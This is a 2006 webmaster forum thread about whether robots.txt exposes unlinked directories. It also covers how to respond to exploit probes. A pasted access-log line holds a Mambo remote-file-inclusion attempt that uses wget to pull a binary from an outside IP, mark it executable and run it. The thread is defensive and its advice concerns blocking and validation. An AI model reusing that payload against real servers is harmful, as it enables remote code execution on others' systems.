Newbie robots.txt question

Forum Moderators: goodroi

Message Too Old, No Replies

Newbie robots.txt question

Can a robot find content not referenced in pages on the site?

joykesilon

5:13 pm on Mar 4, 2006 (gmt 0)

Hi,

I have a feeling this might be a stupid question, but I haven't been able to find a satisfactory answer anywhere.

I have a couple of directories in the root of my web site which are not referenced in any of the pages on the site (i.e. none of the pages on the site link to the directories or any of the files therein).

My question is, by adding a robots.txt file (allowing any user agent and disallowing nothing) is it possible for a robot to find those directories and their contents? I don't particularly want to advertise their existence by explicitly disallowing them - just in case.

All the pages on the site currently have the <meta name="robots" content="all" /> tag, which I assume is equivalent the the suggested robots.txt file above and I'm assuming that the directories and their contents can't be found this way. In which case I may have answered my own question, but I just need confirmation for peace of mind before I go ahead and add the robots.txt file.

Thanks in advance,

Ken.

Dijkgraaf

3:15 am on Mar 5, 2006 (gmt 0)

If it is publically accesible on the web, then yes there is a change that it will get spidered.
All it takes is for someone to link to it somewhere, and it will get picked up and spidered.

Disallows match anything begining with what you specify, so for if example you had a directory called
notallowedhere you could
disallow: /notallow

This way it doesn't reveal the full name of the directory, but will still tell good bots not to try to fetch things from there.

This of course only works for well behaved bots. If you really want to restrict access, you will have to password protect the files.

joykesilon

10:35 am on Mar 5, 2006 (gmt 0)

Thanks for the reply. I hadn't appreciated that you could specify the beginning of a file or directory name for disallow; that could be an option.

I'm afraid I'm a little bit paranoid because my log file keeps showing things like this, which I assume are attempts to find and exploit vulnerabilities:

64.50.10.100 - - [05/Mar/2006:05:28:16 +0000] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo¦ HTTP/1.1" 404 309

64.50.10.100 - - [05/Mar/2006:05:28:23 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306

Is there anything I can do about these, or do I have to live with them (slightly OT, I know - apologies)?

Dijkgraaf

8:02 pm on Mar 6, 2006 (gmt 0)

Yes, that looks like an attempt to exploit a mambo vulnerability.

There is nothing you can do to stop people sending requests like that.

If you server is an Apache server you could try having rules in your .htaccess that would deny requests like that, but you would have to be carefull implementing those otherwise you could deny legitimate traffic.
For IIS you can run a lockdown utility that will intercept some of those type of requests, and websites built with the .NET framework also include some checks against those type of exploits as well.

Other than that you just have to make sure that whatever dynamic pages you use verify all GET and POST parameters and reject any thing that is not expected/allowed.